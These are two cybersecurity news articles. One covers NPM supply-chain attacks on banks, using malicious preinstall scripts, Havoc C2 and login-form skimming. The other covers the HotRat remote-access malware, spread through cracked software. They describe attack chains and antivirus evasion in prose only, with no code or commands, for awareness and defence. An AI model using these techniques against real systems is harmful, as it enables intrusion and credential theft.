Threat Actors Use Open-Source Software Supply Chain TTP to Target Banking Sector
- Written by Shipra Sanganeria Cybersecurity & Tech Writer
First ever known cybersecurity attack involving open-source software (OSS) was discovered by researchers at Checkmarx, a US-based application security solutions company. The OSS supply chain attacks identified in the first half of 2023, specifically targeted the banking sector.
Open-source software supply chain Tactics, Techniques, and Procedures (TTP) is an attack vector where the attacker infiltrates the target’s network system by exploiting the open-source software components.
The first incident is said to have occurred on the 5th & 7th of April, when the attacker uploaded a package to the NPM registry. This package came with a preinstall script that executed the infection upon installation.
Before initiating the attack, the script identified the target’s operating system (Windows, Linux, or MacOS) and decoded the relevant encrypted files in the NPM package. Next, it proceeded to download a second-stage malware using Microsoft Azure’s CDN subdomain that incorporated the name of the targeted bank. To avoid detection and bypass traditional deny list methods, Azure was utilized.
Havoc, an advanced post-exploitation command and control framework was used by the attacker in the second stage as it’s known to easily bypass security tools, like Windows Defender. ‘’Havoc’s ability [..] makes it a go-to option for threat actors, replacing legitimate toolkits such as Cobalt Strike, Sliver, and Brute Ratel.’’
Checkmarx also noted that the contributor behind the malicious packages was linked to a LinkedIn page of an individual impersonating as an employee of the targeted bank.
In another unrelated attack (February 2023) a different bank was targeted where the attackers uploaded a package to NPM registry which deployed a cleverly crafted code that latched ‘’onto a specific login form element, stealthily intercepting login data and then transmitting it to a remote location.’’ The primary target of this attack was discovered to be the target bank’s mobile login page.
The researchers stated that once they notified the concerned institutions of the open-source malwares, immediate actions ensued to remove the malicious packages. However, they expect such attacks against the banking sector’s software supply chain to continue.
They further argued that the current ‘’vulnerability scanning at the build level’’ is no longer effective and it is essential that organizations ‘’adopt a proactive, integrated security architecture, incorporating protective measures at every stage of the SDLC.’’
HotRat: Hackers Exploit Pirated Software to Spread This New AsyncRAT Variant
- Written by Shipra Sanganeria Cybersecurity & Tech Writer
A new AsyncRAT malware variant named HotRat is being spread through free cracked software of popular system and development tools as well as video games. Once deployed, the malware helps the attacker steal personal and sensitive information from the victim’s machine.
‘’HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data,’’ Avast researchers said.
Equipping cracked software sourced online with a malicious AutoHotkey script, the malware conceals a PowerShell script that aims to deactivate security solutions, establish system persistence, and eventually launch the malware HotRat using a Visual Basic Script (VBS) Loader.
‘’Since HotRat is run with admin privileges, it is very easy for attackers to make changes in security,’’ noted Avast. The malware has been observed to have the capability to evade or bypass most antivirus software including Avira, Windows Defender, AVG, Malwarebytes, McAfee.
HotRat, described as a comprehensive RAT malware has been designed with additional capabilities including stealthily extracting sensitive information and credentials as well as deploying other malwares. The researchers identified 20 new commands with capabilities to execute .NET payloads sent from C2 (Command and Control) servers. This functionality allows the hackers behind the campaign to execute, change or add commands as desired.
The researchers noted that the malware has been more prevalent since the middle of October 2022, with the majority of infestations occurring in South Asia, East Europe, North America, and African regions.
‘’Despite the known dangers, [..] irresistible temptation to acquire high-quality software at no cost persists, leading many people to download illegal software. [..] The spread of this malware happens through public repositories, with links being disseminated on social networks and forums,’’ noted the researchers.
It is imperative that users avoid dubious websites offering free software downloads and update system security solutions, to safeguard against malware infestations.
